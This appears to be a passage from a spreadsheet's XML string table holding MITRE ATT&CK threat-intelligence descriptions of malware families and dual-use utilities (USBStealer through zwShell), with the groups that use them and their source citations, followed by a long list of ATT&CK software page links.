    <t>[USBStealer](https://attack.mitre.org/software/S0136) is malware that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>A Linux rootkit that provides backdoor access and hides from defenders.</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) is a rootkit used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s, and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. (Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[VaporRage](https://attack.mitre.org/software/S0636) is a shellcode downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[WastedLocker](https://attack.mitre.org/software/S0612) is a ransomware family attributed to [Indrik Spider](https://attack.mitre.org/groups/G0119) that has been used since at least May 2020. [WastedLocker](https://attack.mitre.org/software/S0612) has been used against a broad variety of sectors, including manufacturing, information technology, and media.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020) </t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) is modular malware attributed to [BlackTech](https://attack.mitre.org/groups/G0098) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).(Citation: CISA WellMess July 2020)(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used in attacks against Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)</t>
  </si>
  <si>
    <t>[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007)  on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) is a Trojan used by [TA459](https://attack.mitre.org/groups/G0062), often in conjunction with [PlugX](https://attack.mitre.org/software/S0013). (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>[Zox](https://attack.mitre.org/software/S0672) is a remote access tool that has been used by [Axiom](https://attack.mitre.org/groups/G0001) since at least 2008.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014)</t>
  </si>
  <si>
    <t>[ZxxZ](https://attack.mitre.org/software/S1013) is a trojan written in Visual C++ that has been used by [BITTER](https://attack.mitre.org/groups/G1002) since at least August 2021, including against Bangladeshi government personnel.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at)</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) is data collection malware that has been used since at least February 2019, most notably during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign; there is also a similar x64 version.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)
Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., &lt;code&gt;dir&lt;/code&gt; (Citation: TechNet Dir)), deleting files (e.g., &lt;code&gt;del&lt;/code&gt; (Citation: TechNet Del)), and copying files (e.g., &lt;code&gt;copy&lt;/code&gt; (Citation: TechNet Copy)).</t>
  </si>
  <si>
    <t xml:space="preserve"> [down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)</t>
  </si>
  <si>
    <t>[ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.(Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)</t>
  </si>
  <si>
    <t>[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) is a Monero mining trojan that was first observed in 2018; security researchers assessed [macOS.OSAMiner](https://attack.mitre.org/software/S1048) may have been circulating since at least 2015. [macOS.OSAMiner](https://attack.mitre.org/software/S1048) is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.(Citation: SentinelLabs reversing run-only applescripts 2021)(Citation: VMRay OSAMiner dynamic analysis 2021)</t>
  </si>
  <si>
    <t>[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)</t>
  </si>
  <si>
    <t>[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-
execute" utility. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)</t>
  </si>
  <si>
    <t>[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)</t>
  </si>
  <si>
    <t>[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)</t>
  </si>
  <si>
    <t>[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) is an HTTP variant of the [BoxCaon](https://attack.mitre.org/software/S0651) malware family that has used by [IndigoZebra](https://attack.mitre.org/groups/G0136) since at least 2014. [xCaon](https://attack.mitre.org/software/S0653) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)</t>
  </si>
  <si>
    <t>[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon](https://attack.mitre.org/campaigns/C0002).(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0066</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0065</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0677</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0469</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0045</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0073</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1028</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0552</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0331</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0092</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1025</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0504</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0584</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0622</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0456</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0099</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0373</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0438</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1029</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0347</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0129</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0640</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0473</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0344</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0031</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0245</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0642</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0128</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0470</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0127</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0017</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0190</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0069</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0520</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0657</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0360</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0415</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0114</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0014</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0043</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0638</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0414</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0475</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0093</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0606</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0337</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0234</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0239</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0534</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0574</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0268</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0570</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0089</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0564</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0521</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0486</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0635</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0651</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0252</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0204</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1039</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0482</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0025</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0465</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0462</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0222</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0023</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0212</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0137</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0527</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0119</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0693</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0454</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0274</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0077</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0351</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0030</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0484</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0335</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0348</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0261</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0572</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0144</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0631</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0220</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0674</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0107</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0020</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1041</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0667</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0660</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0611</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0054</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0154</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0338</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0369</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0126</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0244</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0608</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0591</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0575</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0492</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0050</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0614</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0046</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0488</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1023</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1024</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0115</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0235</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0538</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0498</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0625</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0687</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1033</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0255</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0616</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0213</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0694</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0497</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1014</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0334</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0673</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0187</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0243</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0354</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0021</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0659</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0200</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1021</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0281</t>
